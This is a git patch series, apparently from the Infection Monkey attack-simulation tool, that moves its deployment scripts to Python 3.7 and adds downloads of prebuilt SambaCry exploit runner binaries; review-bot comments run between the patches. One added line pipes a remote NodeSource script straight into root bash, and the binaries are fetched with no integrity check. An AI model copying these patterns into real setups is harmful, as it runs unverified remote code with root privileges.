@@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From eaee0451c50d802f73c370e519d45c31501c5cb1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 14/53] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config 
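Review bot: `[Environment]::SetEnvironmentVariable("Path",$env:Path,"User")` persists the entire process PATH into the user's registry PATH, and the Python-install branch earlier in this function (the `@@ -56,13 +56,12 @@` hunk higher on this page) appears to rebuild `$env:Path` from the Machine and User values, so every machine-wide entry is copied into the User scope permanently on each run; persist only the new entry: `$userPath = [Environment]::GetEnvironmentVariable("Path","User")` followed by `[Environment]::SetEnvironmentVariable("Path", ($userPath.TrimEnd(';') + ";" + $user_python_dir), "User")`. `$user_python_dir = cmd.exe /c 'py -m site --user-site'` relies on the `py` launcher although every other call in this script uses `python`; if `py` is absent the captured error text, not a path, is what gets appended to PATH, so check `$LASTEXITCODE` (or call `python -m site --user-site`) before using the value. `$ENV:PATH | Select-String -SimpleMatch $user_python_dir` is a substring test that is also satisfied by a longer entry beginning with that path; splitting on `;` and comparing entries is more precise. Deploy-Windows begins and ends outside the hunk.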
@@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
 WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
 WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
 
+# Other binaries for monkey
+TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64"
+TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32"
+SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so"
+SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so"
+
 # Mongo url's
 MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
 MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh
index 4df8ba114..136e3f8b1 100644
--- a/deployment_scripts/deploy_linux.sh
+++ b/deployment_scripts/deploy_linux.sh
@@ -11,9 +11,9 @@ fi
 ISLAND_PATH="$monkey_home/monkey/monkey_island"
 MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
 MONGO_PATH="$ISLAND_PATH/bin/mongodb"
-MONGO_BIN_PATH="$MONGO_PATH/bin"
-ISLAND_DB_PATH="$ISLAND_PATH/db"
 ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
+INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey"
+MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin"
 
 handle_error () {
 echo "Fix the errors above and rerun the script"
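Review bot: The four new `*_BINARY_URL` entries are pinned to the 1.6 release tag but carry no expected digest, and deploy_linux.sh fetches them with `wget` straight into the monkey's bin directory, from where they are presumably packaged into the agent; add a sibling `SAMBACRY_64_BINARY_SHA256="<sha256 of sc_monkey_runner64.so>"` (and the same for the other three) so the deploy script can run `sha256sum -c` after each download. A one-line comment noting that these prebuilt artifacts replace the in-tree `build.sh` compile step would also tell the next reader why they are downloaded instead of built.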
@@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl 
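Review bot: `sudo apt install python3.7` followed by `python_cmd="python3.7"` is unguarded, so when the install fails the script carries on with a command that does not exist and every later `${python_cmd} -m pip` line fails with a less obvious error; `sudo apt install -y python3.7 || handle_error` covers both the unattended and the failure case, and since `add-apt-repository` on Ubuntu 16 may not refresh the index itself, a `sudo apt-get update` between the two lines is needed for the PPA to be usable at all. `${python_cmd} -m pip install pip` is the only pip invocation in the script without `--user` and without `|| handle_error`, so as the non-root user the script insists on it either fails or installs somewhere other than where the requirements below go; make it `${python_cmd} -m pip install --user --upgrade pip || handle_error`. The three detection `if` blocks are independent and the last match wins, which is fine but worth stating: `# Later checks override earlier ones: prefer python3.7, then python37, then python`.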
@@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt 
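Review bot: `npm update` now runs directly after `sudo apt-get install npm` and before `cd "$ISLAND_PATH/cc/ui" || handle_error` (in the removed version it ran after the `cd`), so it operates on whatever directory the script is in at that point — the island root after the certificate step, as far as the surrounding lines show — rather than on the UI project; move it below the `cd`. `sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1` still pulls the Python 2 header package although the requirements are now installed with `${python_cmd}`; extensions built for 3.7 need `python3.7-dev`. `mkdir ${MONKEY_BIN_DIR}` without `-p` errors on every rerun once the directory exists; `mkdir -p ${MONKEY_BIN_DIR} || handle_error` matches the other directory creation in this script. The four `wget -c -N -P ${MONKEY_BIN_DIR} ...` lines replace the in-tree sambacry build with prebuilt shared objects and perform no integrity check; verifying each against a digest kept next to its URL in `deployment_scripts/config` (`sha256sum -c`) would detect a tampered or truncated download, and the log message `"Downloading tracerout binaries"` should read `traceroute`.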
+++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file 
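Review bot: Replacing `psutil==3.4.2` with a bare `psutil` removes the version pin, so each deployment pulls whatever psutil is current and a breaking or compromised release is picked up silently; pin to the version that was actually tested under Python 3, e.g. `psutil==<tested version>`. If the intent is only a floor for Python 3 support, a bounded range such as `psutil>=<minimum>,<<next major>` keeps an upper limit while allowing patch updates.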
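Review bot: `./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db` runs mongod in the foreground, so `${python_cmd} monkey_island.py` on the last line is not reached until mongod exits; background it (or start it with `--fork --logpath <log file>`) and wait until it accepts connections before launching the island. If none of the three version checks match, `python_cmd` stays empty and the last line runs `monkey_island.py` as a bare command; add `if [[ -z ${python_cmd} ]]; then echo "Python 3.7 not found"; exit 1; fi` after the detection block. Both relative paths also assume the script is started from a specific working directory (the old version did `cd /var/monkey` first), which the script could enforce with `cd "$(dirname "$0")/.." || exit 1` instead of relying on the reader.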
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 49c1e37a5..c6088a3ea 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From 05af080f98e24dbb1bc23667e6523fede2822a84 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 17 Oct 2019 18:06:01 +0300 Subject: [PATCH 15/53] Linux deployment fixes --- deployment_scripts/deploy_linux.sh | 4 ++++ monkey/infection_monkey/exploit/sshexec.py | 1 - monkey/monkey_island/linux/run.sh | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 136e3f8b1..f3cc4001c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -70,6 +70,7 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt update sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" @@ -82,6 +83,9 @@ log_message "Installing pip" sudo apt install python3-pip ${python_cmd} -m pip install pip +log_message "Install python3.7-dev" +sudo apt-get install python3.7-dev + log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index f7abd3ce0..9765f018c 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py 
@@ -5,7 +5,6 @@ import time import paramiko import infection_monkey.monkeyfs as monkeyfs -from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_interface_to_target diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 235b30469..26d8c3234 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -13,4 +13,4 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then fi ./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py \ No newline at end of file +${python_cmd} monkey_island.py From e52491aef5ca32cc66c131fa37a589540953b65e Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 10:17:47 +0300 Subject: [PATCH 16/53] Small linux deployment script improvement --- deployment_scripts/deploy_linux.sh | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index f3cc4001c..70ca2e5e3 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -90,6 +90,11 @@ log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error +log_message "Installing monkey requirements" +sudo apt-get install libffi-dev upx libssl-dev libc++1 +cd ${monkey_home}/monkey/infection_monkey || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + # Download binaries log_message "Downloading binaries" wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL} 
@@ -137,12 +142,6 @@ log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist -# Monkey setup -log_message "Installing monkey requirements" -sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 -cd ${monkey_home}/monkey/infection_monkey || handle_error -${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error - # Making dir for binaries mkdir ${MONKEY_BIN_DIR} From fbe9708da654a6190438af7a83bb351cc870129d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 14:46:59 +0300 Subject: [PATCH 17/53] Removed ppa, unused certificate generation, updated readme --- deployment_scripts/README.md | 2 +- deployment_scripts/deploy_linux.sh | 14 +++----------- monkey/monkey_island/linux/run.sh | 4 ++-- monkey/monkey_island/readme.txt | 10 +++++----- 4 files changed, 11 insertions(+), 19 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 10027edce..0faf95a52 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -16,7 +16,7 @@ Don't forget to add python to PATH or do so while installing it via this script. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions, for e.g. /home/your_username +Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 70ca2e5e3..5e191d5fe 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,9 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo add-apt-repository ppa:deadsnakes/ppa - sudo apt update - sudo apt install python3.7 + sudo apt-get update + sudo apt-get install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi @@ -119,13 +118,6 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -cd ${ISLAND_PATH} || handle_error -openssl genrsa -out cc/server.key 1024 || handle_error -openssl req -new -key cc/server.key -out cc/server.csr \ --subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error -openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error - - sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error @@ -151,7 +143,7 @@ wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} # Download traceroute binaries -log_message "Downloading tracerout binaries" +log_message "Downloading traceroute binaries" wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 26d8c3234..dc1a266de 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh 
@@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +${python_cmd} ./monkey_island.py diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 956892e23..16bcabf0e 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -22,7 +22,7 @@ How to set up the Monkey Island server: OR 3.b. Use already running instance of mongodb 3.b.1. Run 'set MONKEY_MONGO_URL="mongodb://:27017/monkeyisland"'. Replace '' with address of mongo server - + 4. Place portable version of OpenSSL 4.1. Download from: https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip 4.2. Extract content from bin folder to monkey_island\bin\openssl @@ -56,7 +56,7 @@ How to run: 2. Install the packages from monkey_island/requirements.txt: sudo python -m pip install -r /var/monkey_island/requirements.txt If pip is not installed, install the python-pip package. Make sure the server is running Python 2.7 and not Python 3+. - + 3. put monkey binaries in /var/monkey_island/cc/binaries monkey-linux-64 - monkey binary for linux 64bit monkey-linux-32 - monkey binary for linux 32bit @@ -81,11 +81,11 @@ How to run: 8. Install npm 8.1. Download and install from: https://www.npmjs.com/get-npm - + 9. Build Monkey Island frontend 9.1. cd to 'monkey_island/cc/ui' 9.2. run 'npm update' 9.3. run 'npm run dist' - + How to run: -1. run run.sh (located under /linux) +1. When your current working directory is monkey, run run.sh (located under /linux) From 4457cdc0c83082ff14a39eeae9664ba58d9fe100 Mon Sep 17 00:00:00 2001 
From: VakarisZ Date: Wed, 23 Oct 2019 15:11:58 +0300 Subject: [PATCH 18/53] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 5e191d5fe..d83d24620 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,8 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo apt-get update - sudo apt-get install python3.7 + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi From a305611558d8a079075bd54fbf5f130380373113 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 10:02:50 +0300 Subject: [PATCH 19/53] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 8 +++++--- monkey/monkey_island/linux/run.sh | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index d83d24620..1c0f7221c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh 
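Review bot: `sudo add-apt-repository ppa:deadsnakes/ppa` is followed directly by `sudo apt install python3.7` with no `apt-get update` in between — the one added in PATCH 15 was dropped in PATCH 17 and is not restored here — so on Ubuntu 16 the freshly added PPA's index may not have been fetched and the install fails; insert `sudo apt-get update` between the two lines (or use `add-apt-repository -y -u` where the target release supports `-u`). Adding a third-party PPA also means trusting its signing key for every future `apt` run on that machine, which belongs in a comment on the line, e.g. `# deadsnakes is a third-party PPA; Ubuntu 16.x ships no python3.7 package of its own`. Neither command has `|| handle_error`, unlike the rest of the script.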
@@ -118,10 +118,13 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error -${ISLAND_PATH}/linux/create_certificate.sh || handle_error +cd ${ISLAND_PATH} +openssl genrsa -out cc/server.key 2048 +openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" +openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node +cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" sudo apt-get install -y nodejs @@ -131,7 +134,6 @@ sudo apt-get install npm npm update log_message "Generating front end" -cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist # Making dir for binaries diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index dc1a266de..54e1cdd65 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db & ${python_cmd} ./monkey_island.py From 222b9432e8b412b560cc617127eb1fc8c52f2e77 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 11:17:10 +0300 Subject: [PATCH 20/53] fixed front end dependencies --- deployment_scripts/deploy_linux.sh | 8 +++----- monkey/monkey_island/readme.txt | 2 +- 2 files changed, 4 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 1c0f7221c..488911f15 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh 
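Review bot: `openssl genrsa -out cc/server.key 2048` writes the island's TLS private key with the process umask, which on a default Ubuntu user account leaves it world-readable; restrict it at creation with `(umask 077 && openssl genrsa -out cc/server.key 2048) || handle_error`, or `chmod 600 cc/server.key` immediately after. The three `openssl` lines and the preceding `cd ${ISLAND_PATH}` also dropped the `|| handle_error` that the replaced `create_certificate.sh` invocation carried, so a failed key or certificate generation is only noticed when the island fails to start. The `cd "$ISLAND_PATH/cc/ui" || handle_error` that moved under `# Update node` runs before `sudo apt-get install -y nodejs`, which is harmless, but the comment now describes only part of what the block does.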
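Review bot: Backgrounding mongod with `&` and starting `${python_cmd} ./monkey_island.py` on the very next line races mongod's startup, and the backgrounded daemon outlives the script with its pid never recorded, so a rerun starts a second instance against the same `--dbpath`; either poll until mongod answers before launching the island, or use `mongod --fork --logpath ./monkey_island/bin/mongodb/mongod.log --dbpath ...` and document where the log lives. If the inline form is kept, `mongo_pid=$!` after the `&` line and `trap 'kill ${mongo_pid}' EXIT` would at least stop the daemon when the island exits.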
@@ -124,13 +124,11 @@ openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L= openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node -cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" +cd "$ISLAND_PATH/cc/ui" || handle_error +curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - sudo apt-get install -y nodejs - -# Install npm -log_message "Installing npm" -sudo apt-get install npm +npm install sass-loader node-sass webpack --save-dev npm update log_message "Generating front end" diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 16bcabf0e..87b2f8c40 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -88,4 +88,4 @@ How to run: 9.3. run 'npm run dist' How to run: -1. When your current working directory is monkey, run run.sh (located under /linux) +1. When your current working directory is monkey, run ./monkey_island/linux/run.sh (located under /linux) From 1c32ef156a5283ecb733031e14991252bd978f49 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 12:54:00 +0300 Subject: [PATCH 21/53] Improved linux deployment instructions --- deployment_scripts/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 0faf95a52..f69a48b77 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -13,10 +13,11 @@ Don't forget to add python to PATH or do so while installing it via this script. ## Linux +Linux deployment script is meant for Ubuntu 16.x machines. You must have root permissions, but don't run the script as root.
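Review bot: `curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -` executes a remote script as root with no integrity check and no error handling — with `-s` a failed fetch is silent and a truncated download still runs — so at minimum download to a file, verify it, and run it with `|| handle_error`; better, add the NodeSource apt source and its key explicitly and install `nodejs` from that. `npm install sass-loader node-sass webpack --save-dev` mutates `package.json` (and any lockfile) at deploy time with whatever versions are current, so two deployments can build different front ends and the repository no longer describes the build; commit these dev dependencies with pinned versions and let `npm install` resolve them. The following `npm update` then moves every dependency off whatever was locked, which compounds the same problem.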
Launch deploy_linux.sh from scripts directory.
-First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username +First argument should be an absolute path of an empty directory (script will create one if doesn't exist, default is ./infection_monkey). +Second parameter is the branch you want to clone (develop by default). Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
